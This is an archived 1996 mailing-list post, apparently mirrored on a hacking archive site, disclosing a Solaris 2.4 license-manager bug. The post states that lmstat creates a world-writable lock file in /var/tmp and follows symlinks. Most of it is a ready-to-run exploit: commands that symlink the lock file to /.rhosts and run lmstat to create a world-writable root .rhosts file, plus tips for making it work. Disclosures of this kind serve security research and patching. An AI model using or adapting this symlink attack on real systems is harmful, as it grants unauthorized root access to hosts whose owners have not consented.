AOH :: SunOS/Solaris :: SOLAR001.TXT

AOH :: SunOS/Solaris :: SOLAR001.TXT
Solaris 2.4 license-manager bug



                        solaris 2.4 license-manager bug
                                       
   Grant Kaufmann (gkaufman@cs.uct.ac.za)
   Wed, 16 Oct 1996 23:46:07 +0200
   
Another bug for solaris 2.4
The license manager must be running, expect both
lmgrd.ste & suntechd to be somewhere in your process table.

/var/tmp/locksuntechd will be created by anyone who runs
lmstat, with perms 666 and quite happy to follow symlinks.
Anyway, here's the exploit.

-+-+-+ CUT
rm /var/tmp/locksuntechd
ln -s /.rhosts /var/tmp/locksuntechd
lmstat -c <insert your license file name here>

NOTES
lmstat could be anywhere on your filesystem. try /etc/opt/licenses
I found that sometimes this didn't work first time. It didn't create
the file. Just run lmstat again and it'll work.
-+-+-+

--
Grant
--
http://www.cs.uct.ac.za/~gkaufman/pgp.html

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.